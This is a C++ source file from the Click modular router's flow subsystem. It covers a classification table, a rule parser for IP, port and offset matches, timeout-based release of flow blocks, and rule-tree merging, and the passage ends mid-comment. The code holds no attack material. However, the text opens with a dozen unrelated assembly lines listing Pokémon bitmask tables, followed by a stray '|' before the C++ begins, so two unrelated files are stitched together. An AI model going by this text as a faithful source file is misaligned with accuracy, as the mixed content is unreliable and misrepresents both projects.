dw NosepassBitmasks
dw SkittyBitmasks
dw DelcattyBitmasks
dw SableyeBitmasks
dw MawileBitmasks
dw AronBitmasks
dw LaironBitmasks
dw AggronBitmasks
dw MedititeBitmasks
dw MedichamBitmasks
dw ElectrikeBitmasks
dw ManectricBitmasks
|
// -*- c-basic-offset: 4; related-file-name: "../include/click/flow/flow.hh" -*-
/*
* flow.{cc,hh} -- the Flow class
* Tom Barbette
*
* Copyright (c) 2015 University of Liege
* Copyright (c) 2019-2021 KTH Royal Institute of Technology
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software")
* to deal in the Software without restriction, subject to the conditions
* listed in the Click LICENSE file. These conditions include: you must
* preserve this copyright notice, and you cannot mention the copyright
* holders in advertising related to the Software without their permission.
* The Software is provided WITHOUT ANY WARRANTY, EXPRESS OR IMPLIED. This
* notice is a summary of the Click LICENSE file; the license in that file is
* legally binding.
*/
#include <click/config.h>
#include <click/glue.hh>
#include <stdlib.h>
#include <regex>
#include <click/flow/flow.hh>
#include <click/flow/flowelement.hh>
#include <click/flow/ctxelement.hh>
CLICK_DECLS
#ifdef HAVE_FLOW
// Per-thread pointers to the FCB currently being processed and to the flow
// table that owns it (saved/restored e.g. in ~FlowTableHolder below).
__thread FlowControlBlock* fcb_stack = 0;
__thread FlowTableHolder* fcb_table = 0;
/*******************************
* FlowClassificationTable
*******************************/
/**
 * Construct an empty classification table with no root node yet
 * (set_root() must be called before use).
 */
FlowClassificationTable::FlowClassificationTable() : _root(nullptr)
{
}
/**
 * Install the root of the classification tree.
 * The release function must already be set (asserted below).
 */
void FlowClassificationTable::set_root(FlowNode* node) {
assert(node);
assert(_classifier_release_fnt);
_root = node;
/*#if HAVE_DYNAMIC_FLOW_RELEASE_FNT
auto fnt = [this](FlowControlBlock* fcb){
fcb->release_fnt = _classifier_release_fnt;
};
node->traverse<decltype(fnt)>(fnt);
#endif*/
}
// Accessor for the root classification node (0 if set_root was never called).
FlowNode* FlowClassificationTable::get_root() {
return _root;
}
// Initialize an empty holder: no release callback or thunk yet, empty FCB
// pool and (when sloppy timeouts are enabled) empty per-thread old-flow lists.
FlowTableHolder::FlowTableHolder() :
#if HAVE_FLOW_RELEASE_SLOPPY_TIMEOUT
old_flows(fcb_list()),
#endif
_pool(), _classifier_release_fnt(0), _classifier_thunk(0)
{
}
#if HAVE_FLOW_RELEASE_SLOPPY_TIMEOUT
/**
 * Unlink and release every FCB queued on the per-thread "old flows" lists.
 * NOTE(review): walks all threads' lists from the calling thread; the
 * destructor's TODO below suggests this should run on each owning thread.
 */
void
FlowTableHolder::delete_all_flows() {
for (int i = 0; i < old_flows.weight(); i++) { // one list per thread
fcb_list& head = old_flows.get_value(i);
FlowControlBlock* next = 0;
FlowControlBlock* b = head._next;
FlowControlBlock** prev = &head._next;
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK || DEBUG_CLASSIFIER_TIMEOUT
assert(head.count() == head.find_count());
#endif
while (b != 0) {
next = b->next;
b->flags = 0; // clears FLOW_TIMEOUT_INLIST and any timeout bits
*prev = b->next;
head._count--;
#if HAVE_FLOW_DYNAMIC
b->_do_release();
#endif
b = next;
}
}
}
#endif
// Destructor: temporarily points the thread-local fcb_table at this holder
// (restored afterwards); the actual flow deletion is disabled pending the
// thread-affinity TODO below.
FlowTableHolder::~FlowTableHolder() {
auto previous = fcb_table;
fcb_table = this;
#if HAVE_FLOW_RELEASE_SLOPPY_TIMEOUT
//TODO : same, do from the right thread
//delete_all_flows();
#endif
fcb_table = previous;
}
/**
 * Register the callback used to release classifier-owned sub-flows,
 * together with the opaque pointer handed back to it.
 *
 * @param pool_release_fnt the release callback
 * @param thunk opaque user data passed to the callback
 */
void FlowTableHolder::set_release_fnt(SubFlowRealeaseFnt pool_release_fnt, void* thunk) {
_classifier_thunk = thunk;
_classifier_release_fnt = pool_release_fnt;
}
// Delete the classification tree. The pool allocator's "dying" flag is set
// around the deletion (and restored) so node destructors know teardown is
// in progress.
FlowClassificationTable::~FlowClassificationTable() {
bool previous = pool_allocator_mt_base::dying();
pool_allocator_mt_base::set_dying(true);
if (_root)
delete _root;
_root = 0;
pool_allocator_mt_base::set_dying(previous);
}
/**
 * Build a one-level rule classifying on the IP destination address
 * (click_ip.ip_dst) under @a mask, with one pre-acquired leaf FCB keyed by
 * @a dst.
 * NOTE(review): @a dst is used unmasked as the child key - presumably
 * callers pass an address already reduced by @a mask; confirm.
 */
FlowClassificationTable::Rule FlowClassificationTable::make_ip_mask(IPAddress dst, IPAddress mask) {
FlowLevelGeneric32* fl = new FlowLevelGeneric32();
fl->set_match(offsetof(click_ip,ip_dst),mask.addr());
FlowNodeDefinition* node = new FlowNodeDefinition(0);
node->_level = fl;
node->_parent = 0;
FlowControlBlock* fcb = FCBPool::init_allocate();
FlowNodeData ip = FlowNodeData(dst.addr());
bool need_grow;
FlowNodePtr* parent_ptr = node->find(ip,need_grow);
parent_ptr->set_leaf(fcb);
parent_ptr->set_data(ip);
parent_ptr->leaf->parent = node;
#if HAVE_FLOW_DYNAMIC
parent_ptr->leaf->acquire(1); // hold one reference so the leaf stays alive
#endif
node->inc_num(); // the leaf occupies a real child slot, not the default
return Rule{.root=node};
}
/**
 * Parse a textual classification rule into a chain of FlowNodes terminated
 * by a leaf FCB.
 *
 * Informal grammar: a rule is either "-" (match everything) or a
 * "&&"/whitespace-separated list of classes, each one of
 *   agg | thread | ip proto P | (src|dst) host IP | (src|dst) port P |
 *   (src|dst) net NET | [ip]OFFSET/VALUE[/MASK]
 * optionally followed by ":HASH-n" or ":ARRAY" (placement hint) and "!"
 * (important). The list may be followed by "keep" and/or an output number
 * or "drop".
 *
 * @param owner element recorded as creator of each node
 * @param s the rule text
 * @param verbose chatter about every parsed class
 * @param add_leaf if false, force the chain to end in a dummy level before the leaf
 * @return a Rule with the root node, output port (-1 drop, INT_MAX unset) and default flag
 *
 * Aborts the process on unparsable input.
 */
FlowClassificationTable::Rule FlowClassificationTable::parse(Element* owner, String s, bool verbose, bool add_leaf) {
String REG_IPV4 = "[0-9]{1,3}(?:[.][0-9]{1,3}){3}";
String REG_NET = REG_IPV4 + "/[0-9]+";
String REG_AL = "(?:[a-z]+|[0-9]+)";
// Whole-rule regex: group 1 = class list (or "-"), 2 = " keep", 3 = output/drop.
std::regex reg(("((?:(?:(?:agg|thread|(?:ip proto "+REG_AL+"|(?:src|dst) (?:host "+REG_IPV4+"|port "+REG_AL+"|net "+REG_NET+")|(?:(?:ip)?[+-]?[0-9]+/[0-9a-fA-F]+?/?[0-9a-fA-F]+?)))(?:[:]HASH-[0-9]+|[:]ARRAY)?[!]?(?:[ ]*&&[ ]*|[ \t]*))+)|-)([ \t]+keep)?([ \t]+[0-9]+|[ \t]+drop)?").c_str(),
std::regex_constants::icase);
// Per-class regex, iterated over the class list below.
std::regex classreg(("thread|agg|(?:(ip) (proto) ([a-z]+|[0-9]+)|(src|dst) (?:(host) ("+REG_IPV4+")|(port) ("+REG_AL+")|(net) ("+REG_NET+"))|(ip[+])?([-]?[0-9]+)/([0-9a-fA-F]+)?/?([0-9a-fA-F]+)?)([:]HASH-[0-9]+|[:]ARRAY)?([!])?").c_str(),
std::regex_constants::icase);
FlowNode* root = 0;
FlowNodePtr* parent_ptr = 0;
bool deletable_value = false;
int output = 0;
bool is_default = false;
std::smatch result;
std::string stdstr = std::string(s.c_str());
if (std::regex_match(stdstr, result, reg)){
FlowNodeData lastvalue = FlowNodeData((uint64_t)0);
std::string classs = result.str(1);
std::string keep = result.str(2);
std::string deletable = result.str(3);
// Trailer: "keep" marks the rule non-deletable; otherwise an explicit
// output number, "drop" (-1) or nothing (INT_MAX = unset).
if (keep == " keep")
deletable_value = true;
else if (deletable == " drop")
output = -1;
else if (deletable != "") {
output = std::stoi(deletable);
} else {
output = INT_MAX;
}
FlowNode* parent = 0;
if (classs != "-") {
// One node is built per class; each iteration links the new node
// under parent_ptr (the slot selected by the previous iteration).
std::regex_iterator<std::string::iterator> it (classs.begin(), classs.end(), classreg);
std::regex_iterator<std::string::iterator> end;
while (it != end)
{
if (verbose)
click_chatter("Class : %s",it->str(0).c_str());
// Groups 11..16 hold the generic "[ip]offset/value/mask:hint!" form.
int manoffset = 10;
std::string layer = it->str(1 + manoffset);
std::string offset = it->str(2 + manoffset);
std::string value = it->str(3 + manoffset);
std::string mask = it->str(4 + manoffset);
std::string hint = it->str(5 + manoffset);
std::string important = it->str(6 + manoffset);
if (verbose)
click_chatter("o : %s, v : %s, m : %s",offset.c_str(),value.c_str(), mask.c_str());
FlowLevel* f;
bool dynamic = false; // dynamic levels classify on runtime values, not a fixed constant
unsigned long valuev = 0;
if (classs == "agg" || classs=="AGG") {
// Classify on the packet aggregate.
FlowLevelAggregate* fl = new FlowLevelAggregate();
/*if (offset == "") {
fl->offset = 0;
} else {
fl->offset = std::stoul(offset);
}
fl->mask = maskv;*/
f = fl;
if (verbose)
click_chatter("AGG");
dynamic = true;
} else if (classs == "thread" || classs == "THREAD") {
// Classify on the processing thread id.
FlowLevelThread* fl = new FlowLevelThread(click_max_cpu_ids());
f = fl;
click_chatter("THREAD");
dynamic = true;
} else {
unsigned long maskv = 0xffffffff;
int offset_v = 0;
if (it->str(1) == "ip") {
if (it->str(2) != "proto") {
click_chatter("UNIMPLEMENTED IP");
abort();
} else {
// "ip proto X": match the one-byte protocol field at IP offset 9.
offset_v = 9;
maskv = UINT8_MAX;
valuev = 0;
if (it->str(3) == "tcp")
valuev = 6;
else if (it->str(3) == "udp")
valuev = 17;
else if (it->str(3) == "icmp")
valuev = 1;
else {
valuev = strtol(it->str(3).c_str(),NULL,10);
}
if (valuev == 0) {
click_chatter("Could not parse %s", it->str(3).c_str());
abort();
}
}
} else if (it->str(4) != "") {
// "src|dst host/port/net": fixed offsets into the IP(+transport) header.
if (it->str(7) == "port") {
maskv = UINT16_MAX;
if (it->str(4) == "src") {
offset_v = 20;
} else {
offset_v = 22;
}
} else {
maskv = UINT32_MAX;
if (it->str(4) == "src") {
offset_v = 12;
} else {
offset_v = 16;
}
}
if (it->str(5) == "host") {
IPAddress ip(it->str(6).c_str());
valuev = ip.addr();
} else if (it->str(7) == "port") {
valuev = htons(atoi(it->str(8).c_str()));
} else {
click_chatter("UNIMPLEMENTED net");
abort();
}
} else {
// Generic offset/value/mask class; value and mask are hex.
if (value != "" && value != "-") {
valuev = std::stoul(value,nullptr,16);
// Normalize to network byte order according to the value width.
if (value.length() <= 2) {
} else if (value.length() <= 4) {
valuev = htons(valuev);
} else if (value.length() <= 8) {
valuev = htonl(valuev);
} else {
valuev = __bswap_64(valuev);
}
}
if (verbose)
click_chatter("Mask is '%s'",mask.c_str());
if (mask != "")
maskv = std::stoul(mask,nullptr,16);
else
maskv = (1ul << value.length() * 4) - 1; // default mask covers the given hex digits
offset_v = std::stoul(offset);
}
//TODO error for > 64
// Pick the narrowest generic level wide enough for the mask.
if (maskv <= UINT8_MAX){
FlowLevelGeneric8* fl = new FlowLevelGeneric8();
fl->set_match(offset_v,maskv);
if (verbose)
click_chatter("HASH8 Offset : %d, mask : 0x%lx",fl->offset(),fl->mask());
f = fl;
} else if (maskv <= UINT16_MAX){
FlowLevelGeneric16* fl = new FlowLevelGeneric16();
fl->set_match(offset_v,maskv);
if (verbose)
click_chatter("HASH16 Offset : %d, mask : 0x%lx",fl->offset(),fl->mask());
f = fl;
} else if (maskv <= UINT32_MAX){
FlowLevelGeneric32* fl = new FlowLevelGeneric32();
fl->set_match(offset_v,maskv);
if (verbose)
click_chatter("HASH32 Offset : %d, mask : 0x%lx",fl->offset(),fl->mask());
f = fl;
#if HAVE_LONG_CLASSIFICATION
} else {
FlowLevelGeneric64* fl = new FlowLevelGeneric64();
fl->set_match(offset_v,maskv);
if (verbose)
click_chatter("HASH64 Offset : %d, mask : 0x%lx",fl->offset(),fl->mask());
f = fl;
}
#else
} else {
assert(false); // >32-bit masks need HAVE_LONG_CLASSIFICATION
}
#endif
// A mask without a value means "classify on whatever is there".
if ((maskv & valuev) == 0)
dynamic = true;
}
FlowNodeDefinition* node = new FlowNodeDefinition(owner);
if (hint != "") {
node->_hint = String(hint.substr(1).c_str()); // strip the leading ':'
}
node->_level = f;
node->_parent = parent;
if (important == "!") {
//click_chatter("Important !");
node->_else_drop = true; //TODO : this is not really used anymore, all rules are "else drop" as all CTXDispatcher will add an else drop
}
// Link the new node under the slot chosen by the previous iteration.
if (root == 0) {
root = node;
} else {
parent_ptr->set_node(node);
parent_ptr->set_data(lastvalue);
if (parent_ptr != parent->default_ptr())
parent->inc_num();
}
parent = node;
// Select the slot the NEXT node (or the leaf) will be attached to.
if (dynamic) { //If a mask is provided, value is dynamic
//click_chatter("Dynamic node to output %d",output);
parent_ptr = node->default_ptr();
node->level()->set_dynamic();
lastvalue = FlowNodeData((uint64_t)-1);
} else {
//click_chatter("Value %d to output %d",valuev, output);
lastvalue = FlowNodeData((uint64_t)valuev);
bool need_grow;
parent_ptr = node->find(lastvalue, need_grow);
}
++it;
}
// Account for the leaf about to be attached, if it is a real child slot.
if (parent_ptr != parent->default_ptr())
parent->inc_num();
} else {
// "-" rule: a single dummy level matching everything.
if (verbose)
click_chatter("Class : -");
FlowLevel* f = new FlowLevelDummy();
FlowNodeDefinition* fl = new FlowNodeDefinition(owner);
fl->_level = f;
fl->_parent = root;
root = fl;
parent = root;
//click_chatter("Default node to output %d",output);
parent_ptr = root->default_ptr();
is_default = true;
}
if (!add_leaf) {
// Ensure the chain ends with a dummy level before the leaf.
if (dynamic_cast<FlowLevelDummy*>(parent->level()) == 0) {
FlowLevel* f = new FlowLevelDummy();
FlowNodeDefinition* fl = new FlowNodeDefinition(owner);
fl->_level = f;
fl->_parent = parent;
parent_ptr->set_node(fl);
//fl->default_ptr()->set_leaf((FlowControlBlock*)-1);
parent_ptr->set_data(lastvalue);
parent = fl;
parent_ptr = fl->default_ptr();
}
}
// Attach the (pre-acquired) leaf FCB at the selected slot.
FlowControlBlock* fcb = FCBPool::init_allocate();
parent_ptr->set_leaf(fcb);
parent_ptr->leaf->parent = parent;
#if HAVE_FLOW_DYNAMIC
parent_ptr->leaf->acquire(1);
#endif
parent_ptr->set_data(lastvalue);
root->check();
} else {
click_chatter("%s is not a valid rule",s.c_str());
abort();
}
#if DEBUG_CLASSIFIER
click_chatter("Parse result of %s : ",s.c_str());
root->print();
#endif
if (!s.empty())
assert(root);
return FlowClassificationTable::Rule{.root = root, .output = output, .is_default = is_default};
}
#if HAVE_FLOW_RELEASE_SLOPPY_TIMEOUT
/**
 * Queue @a fcb on this thread's "old flows" list so that it is actually
 * released later, once its timeout has passed (see check_release()).
 *
 * @precond fcb is not in the list already (FLOW_TIMEOUT_INLIST unset)
 */
void FlowTableHolder::release_later(FlowControlBlock* fcb) {
fcb_list& head = old_flows.get(); // was "get();;" - stray empty statement removed
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK > 1
assert(!(fcb->flags & FLOW_TIMEOUT_INLIST));
assert(!head.find(fcb));
assert(head.count() == head.find_count());
#endif
// Push at the head of the singly-linked list and mark the FCB as queued.
fcb->next = head._next;
head._next = fcb;
++head._count;
fcb->flags |= FLOW_TIMEOUT_INLIST;
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK > 1
assert(head.count() == head.find_count());
#endif
}
/**
 * Scan this thread's "old flows" list and release the FCBs whose sloppy
 * timeout has expired. FCBs that regained references are simply unlinked
 * (they are alive again); the rest stay queued.
 *
 * @return true if at least one FCB was unlinked or released
 */
bool FlowTableHolder::check_release() {
fcb_list& head = old_flows.get();
FlowControlBlock* next = 0;
FlowControlBlock* b = head._next;
FlowControlBlock** prev = &head._next;
Timestamp now = Timestamp::recent_steady();
bool released_something = false;
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK || DEBUG_CLASSIFIER_TIMEOUT
assert(head.count() == head.find_count());
#endif
while (b != 0) {
next = b->next;
if (b->count() > 0) { // flow regained references: unlink, keep alive
#if DEBUG_CLASSIFIER_TIMEOUT > 2
click_chatter("FCB %p not releasable anymore as UC is %d",b,b->count());
#endif
released_something = true;
b->flags &= ~FLOW_TIMEOUT_INLIST;
*prev = b->next;
head._count--;
} else if (b->timeoutPassed(now)) { // expired: unlink and actually release
#if DEBUG_CLASSIFIER_TIMEOUT > 2
click_chatter("FCB %p has passed timeout",b);
#endif
released_something = true;
b->flags = 0;
*prev = b->next;
head._count--;
#if HAVE_FLOW_DYNAMIC
b->_do_release();
#endif
} else { // still waiting: advance the unlink cursor past it
#if DEBUG_CLASSIFIER_TIMEOUT > 1
// Only needed for the debug output below; computed inside the #if so
// normal builds do not get an unused-variable warning.
unsigned t = (b->flags >> FLOW_TIMEOUT_SHIFT);
click_chatter("Time passed : %d/%d",(now - b->lastseen).msecval(),t);
#endif
prev = &b->next;
}
b = next;
}
#if DEBUG_CLASSIFIER_TIMEOUT > 0
click_chatter("Released %d",head.count());
#endif
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK > 0
assert(head.find_count() == head.count());
#endif
return released_something;
}
#endif
/**
 * Combine @a other into the node held by this pointer.
 * If @a other is a leaf, it is duplicated into every default-leaf slot under
 * this node (empty slots always; occupied ones depending on as_child/priority);
 * otherwise the two nodes are merged via FlowNode::combine.
 */
void FlowNodePtr::node_combine_ptr(FlowNode* parent, FlowNodePtr other, bool as_child, bool priority, bool no_dynamic, Element* origin) {
if (other.is_leaf()) {
assert(!as_child);
auto fnt = [other,as_child,priority,origin,no_dynamic](FlowNode* parent) -> bool {
//If the parent is dynamic, then the default will be duplicated, it is not to be considered as an "else"
if (no_dynamic && parent->level()->is_dynamic())
return true;
if (parent->default_ptr()->ptr == 0) { //This default leaf is empty
parent->default_ptr()->set_leaf(other.leaf->duplicate(1));
parent->default_ptr()->set_parent(parent);
} else {
if (as_child || !priority) {
// Replace the existing default leaf, preserving its node data.
FlowNodeData data = parent->default_ptr()->data();
#if HAVE_FLOW_DYNAMIC
//parent->default_ptr()->leaf->release();
#endif
parent->default_ptr()->set_leaf(other.leaf->duplicate(1));
parent->default_ptr()->leaf->parent = parent;
parent->default_ptr()->set_data(data);
} else {
// Keep the existing leaf but merge other's data into it.
if (!parent->default_ptr()->leaf->combine_data(other.leaf->data, origin))
abort();
if (parent->default_ptr()->leaf->is_early_drop() && !other.leaf->is_early_drop())
parent->default_ptr()->leaf->set_early_drop(false);
}
}
return true;
};
this->node->traverse_all_default_leaf(fnt);
} else {
FlowNode* new_node = node->combine(other.node, as_child, priority, true, origin);
if (new_node != node) { // combine may return a different root
node = new_node;
node->set_parent(parent);
}
}
}
/*******************************
* FlowNode
*******************************/
/**
* Combine this rule with another rule
* @arg other A node to merge
* @arg as_child
* - If true :merge the rule as a child of this one, ie REMOVING all child
* leaves (data is lost) and changing them by other.
* - If false : merge as the "else" path, ie appending other to all default path.
* @arg priority : Whether this node's rules take priority over other's. If
* false, rules may be exchanged for optimization
*
*/
FlowNode* FlowNode::combine(FlowNode* other, bool as_child, bool priority, bool duplicate_leaf, Element* origin) {
//TODO : priority is not used as of now, it is always assumed true. We could relax some things.
if (other == 0) return this;
other->check();
this->check();
assert(other->parent() == 0); // other must be detached before combining
//Remove useless level (case where this is dummy)
if (dynamic_cast<FlowLevelDummy*>(this->level()) != 0) {
debug_flow("COMBINE (as child : %d, default is leaf : %d) : I am dummy",as_child,_default.is_leaf());
if (_default.is_leaf()) {
// This dummy only carries a leaf: push its data into other and use other.
other->leaf_combine_data(_default.leaf, as_child, !as_child && priority, origin);
//TODO delete this;
return other;
} else {
// Skip this dummy level and retry the combine from its child node.
FlowNode* node = _default.node;
_default.ptr = 0;
//TODO delete this;
node->set_parent(0);
return node->combine(other, as_child, priority, duplicate_leaf, origin);
}
}
//Remove useless level (case where other is dummy)
if (dynamic_cast<FlowLevelDummy*>(other->level()) != 0) { //Other is dummy :
debug_flow("COMBINE : Other is dummy")
//If other is a dummy (and we're not)
if (other->_default.is_leaf()) {
debug_flow("COMBINE : Other is a leaf (as child %d, duplicate leaf %d):",as_child, duplicate_leaf)
//other->_default.leaf->print("");
if (as_child) { //Combine a leaf as child of all our leaf
this->leaf_combine_data(other->_default.leaf, true, true, origin);
} else { //Combine a leaf as "else" of all our default routes
/*
* Duplicate the leaf for all null default routes and ED routes if priority is false (and as_child is false)
*/
auto fnt = [other,priority,duplicate_leaf](FlowNode* parent) -> bool {
if (parent->default_ptr()->ptr == 0) {
if (duplicate_leaf) {
parent->default_ptr()->set_leaf(other->_default.leaf->duplicate(1));
} else
parent->default_ptr()->set_leaf(other->_default.leaf);
parent->default_ptr()->set_parent(parent);
} else if (!priority && parent->default_ptr()->leaf->is_early_drop()) {
// Early-drop default loses to other's leaf when we have no priority.
FCBPool::init_release(parent->default_ptr()->leaf);
if (duplicate_leaf) {
parent->default_ptr()->set_leaf(other->_default.leaf->duplicate(1));
} else
parent->default_ptr()->set_leaf(other->_default.leaf);
parent->default_ptr()->set_parent(parent);
}
return true;
};
this->traverse_all_default_leaf(fnt);
//this->default_ptr()->default_combine(this, other->default_ptr(), as_child);
other->default_ptr()->ptr = 0;
}
//TODO delete other;
return this;
} else {
// Skip other's dummy level and combine with its child node instead.
FlowNode* node = other->_default.node;
other->_default.node = 0;
node->set_parent(0);
//TODO delete other;
return this->combine(node,as_child,priority,duplicate_leaf,origin);
}
}
flow_assert(!is_dummy());
flow_assert(!other->is_dummy());
if (this->level()->is_dynamic() && !other->level()->is_dynamic()) {
if (priority) {
click_chatter("Trying to attach a non-dynamic child to a dynamic node. This generally means you need a new CTXManager after a dynamic node, such as TCPIn elements or flow-based one");
this->print();
other->print();
abort();
} else {
// Without priority we may swap the two nodes so the static level comes first.
this->set_parent(0);
debug_flow("Combining a dynamic parent with a non dynamic node. As Priority is false, we invert the child and the parent");
this->debug_print();
other->debug_print();
FlowNodeData d = this->node_data;
FlowNode* o = other->combine(this, as_child, false, duplicate_leaf,origin); //Priority is false in this path
o->node_data = d; // the swapped-in root keeps our position data
return o;
}
}
if (as_child)
__combine_child(other, priority, duplicate_leaf, origin);
else
__combine_else(other, priority, duplicate_leaf, origin);
return this;
}
/**
 * Merge @a other into this node as a child: other's children are absorbed
 * into ours (recursively combining on equal data), and other's default is
 * merged into ours. Used by combine() on the as_child path.
 */
void FlowNode::__combine_child(FlowNode* other, bool priority, bool duplicate_leaf, Element* origin) {
if (level()->equals(other->level())) { //Same level
#if DEBUG_CLASSIFIER
click_chatter("COMBINE : same level");
#endif
FlowNode::NodeIterator other_children = other->iterator();
/**
 * We add each of the other child to us.
 * - If the child does not exist, we add ourself simply as a child
 * - If the child exist, we combine the item with the child
 */
FlowNodePtr* other_child_ptr;
while ((other_child_ptr = other_children.next()) != 0) { //For each child of the other node
#if DEBUG_CLASSIFIER
click_chatter("COMBINE-CHILD : taking child %lu",other_child_ptr->data().get_long());
#endif
bool need_grow;
FlowNodePtr* child_ptr = find(other_child_ptr->data(),need_grow);
if (child_ptr->ptr == 0) { //We have no same data, so we just append the other's child to us
*child_ptr = *other_child_ptr;
child_ptr->set_parent(this);
inc_num();
} else {
//There is some data in our child that is the same as the other child
if (child_ptr->is_leaf() || other_child_ptr->is_leaf()) {
#if DEBUG_CLASSIFIER
click_chatter("Combining leaf??? This error usually happens when rules overlap.");
child_ptr->print();
other_child_ptr->print();
assert(false);
#endif
} else { //So we combine our child node with the other child node
//We must set the parent to null, so the combiner knows it can play with that node
other_child_ptr->node->set_parent(0);
child_ptr->node = child_ptr->node->combine(other_child_ptr->node,true,priority, duplicate_leaf, origin);
child_ptr->node->set_parent(this);
}
}
//Delete the child of the combined rule
other_child_ptr->node = 0;
other->dec_num();
}
assert(other->getNum() == 0); // every child of other must have been absorbed
//Unsupported as of now
/* if (this->default_ptr()->ptr != 0 || other->default_ptr()->ptr == 0) {
click_chatter("Unsupported operation, combine as_child :");
this->print();
other->print();
}*/
//If other had a default, we need to merge it
if (other->default_ptr()->ptr != 0) { //Other had default
other->default_ptr()->set_parent(0);
this->default_ptr()->default_combine(this, other->default_ptr(), true, priority, origin);
other->default_ptr()->ptr = 0;
} //ELse nothing to do as we can keep our default as it, if any*/
//TODO delete other;
this->check();
return;
}
{
// Different levels: other becomes a child of every leaf under this node.
debug_flow("Combining different tables (%s -> %s) (as_child is %d) !",
level()->print().c_str(),
other->level()->print().c_str(),
true);
debug_flow("Adding other as child of all children leaf");
//In other terms, if the packet does not match any of the rules, it will go through "other"
#if DEBUG_CLASSIFIER
this->print();
other->print();
#endif
this->replace_leaves(other, true, false, true, origin);//Discard child FCB always as we are in the as_child path
//Well, it's not that complicated finally.
this->check();
return;
}
//It is too dangerous to keep a default exit case, each path and possible combination must return right by itself
assert(false);
}
/**
* Add a rule to all default path
*/
void FlowNode::__combine_else(FlowNode* other, bool priority, bool duplicate_leaf, Element* origin) {
if (level()->equals(other->level())) { //Same level
if (other->level()->is_dynamic()) {
level()->set_dynamic(); // dynamism propagates to the merged level
}
debug_flow("COMBINE-ELSE : same level");
FlowNode::NodeIterator other_children = other->iterator();
/**
 * We add each of the other child to us.
 * - If the child does not exist, we add ourself simply as a child
 * - If the child exist, we combine the item with the child
 */
FlowNodePtr* other_child_ptr;
while ((other_child_ptr = other_children.next()) != 0) { //For each child of the other node
debug_flow("COMBINE-ELSE : taking child %lu",other_child_ptr->data().get_long());
bool need_grow;
FlowNodePtr* child_ptr = find(other_child_ptr->data(),need_grow);
if (child_ptr->ptr == 0) { //We have no same data, so we just append the other's child to us, merging it with a dup of our default
if (_default.ptr) {
debug_flow("Our child is empty, duplicating default (is_leaf : %d)",_default.is_leaf());
if (_default.is_leaf()) {
//If the other child is a leaf, copying the default would prevent replacement
if (other_child_ptr->is_leaf()) {
child_ptr->set_leaf(other_child_ptr->leaf->duplicate(1));
child_ptr->set_parent(this);
child_ptr->set_data(other_child_ptr->data());
inc_num();
goto next; // other's leaf wins outright; skip the combine step
} else {
if (duplicate_leaf)
child_ptr->set_leaf(_default.leaf->duplicate(1));
else
child_ptr->set_leaf(_default.leaf);
child_ptr->set_data(other_child_ptr->data());
}
} else {
child_ptr->set_node(_default.node->duplicate(true,1, duplicate_leaf));
child_ptr->set_data(other_child_ptr->data());
}
child_ptr->set_parent(this);
inc_num();
goto attach; // the new child (a copy of our default) must still be combined with other's child
} else {
*child_ptr = *other_child_ptr;
child_ptr->set_parent(this);
inc_num();
}
} else {
attach:
//There is some data in our child that is the same as the other child
if (child_ptr->is_leaf() && other_child_ptr->is_leaf()) {
debug_flow("Both rules are leaf, using the parent one if data match");
if (!child_ptr->leaf->combine_data(other_child_ptr->leaf->data, origin)) {
click_chatter("It is probable %p{element} accept the same packets than %p{element}. When merging the two following leafs:", dynamic_cast<FlowNodeDefinition*>(this)->_creator,dynamic_cast<FlowNodeDefinition*>(other)->_creator);
child_ptr->parent()->print();
other_child_ptr->parent()->print();
abort();
}
} else if (child_ptr->is_node() && other_child_ptr->is_node()) {
debug_flow("Both rules are nodes, combining");
//So we combine our child node with the other child node
//We must set the parent to null, so the combiner knows it can play with that node
other_child_ptr->node->set_parent(0);
child_ptr->node = child_ptr->node->combine(other_child_ptr->node,false,priority, duplicate_leaf, origin);
child_ptr->node->set_parent(this);
} else if (child_ptr->is_leaf() && other_child_ptr->is_node()) {
// Push our leaf's data down into other's node, then adopt that node.
other_child_ptr->node->leaf_combine_data_create(child_ptr->leaf, true, true, false, origin);
child_ptr->set_node(other_child_ptr->node);
child_ptr->node->set_parent(this);
} else { //child is node and other is leaf
debug_flow("Child is node and the other is leaf");
//We are in an "else" case. We have to change all default paths to the action of the leaf
//But in case the default actions are dynamic, we don't want to replace as they should not be considered as default
child_ptr->node_combine_ptr(this, *other_child_ptr, false, priority, true, origin);
/**
 * Example of such default situation:
 * Path 0 is IP/TCP/dynamic
 * Path 1 is IP
 * --> We have to keep the data of leaf to path 0
 */
}
}
next:
//Delete the child of the combined rule
other_child_ptr->node = 0;
other->dec_num();
}
assert(other->getNum() == 0);
//If other had a default, we need to merge it
if (other->default_ptr()->ptr != 0) { //Other had default
debug_flow("Other has default (priority %d)!", priority);
other->default_ptr()->set_parent(0);
this->default_ptr()->default_combine(this, other->default_ptr(), false, priority, origin);
other->default_ptr()->ptr = 0;
} //Else nothing to do as we can keep our default as it, if any
//TODO : delete other;
this->check();
return;
}
debug_flow("Mhh... No easy combine. Combining other to all children and default (priority %d, as_child 0)",priority);
//In other terms, if the packet does not match any of the rules, it will go through "other"
this->debug_print();
other->debug_print();
NodeIterator it = iterator();
FlowNodePtr* cur;
// Vpruned_default accumulates other's tree, progressively pruned by every
// leaf child's value; it becomes the "else" merged into our default below.
FlowNodePtr Vpruned_default(other->duplicate(true, 1, duplicate_leaf));
while ((cur = it.next()) != 0) {
if (cur->is_node()) {
bool changed;
cur->node_combine_ptr(this, other->duplicate(true, 1, duplicate_leaf)->prune(level(), cur->data(), false, changed),false, priority, false, origin);
} else {
if (Vpruned_default.is_node()) { //Other is guaranteed to be not null here
bool changed;
// NOTE(review): 'd' is assigned but never used afterwards - looks dead; confirm before removing.
FlowNodeData d = Vpruned_default.data();
Vpruned_default = Vpruned_default.node->prune(level(), cur->data(), true, changed);
}
}
}
#if DEBUG_CLASSIFIER
debug_flow("Pruned other default :");
Vpruned_default.print();
debug_flow("my default:");
if (this->default_ptr()->ptr != 0)
this->default_ptr()->print();
#endif
this->default_ptr()->default_combine(this, &Vpruned_default, false, priority, origin);
//TODO : delete other
#if DEBUG_CLASSIFIER
debug_flow("Result of no easy combine :");
this->print();
this->check();
#endif
return;
}
/**
* Correct iif this FLowNodePtr is a default ptr.
*
* Will combine this default pointer with whatever other is.
* - No need to set the data of the child as we are default
* - Parent is corrected at the end of the function
*/
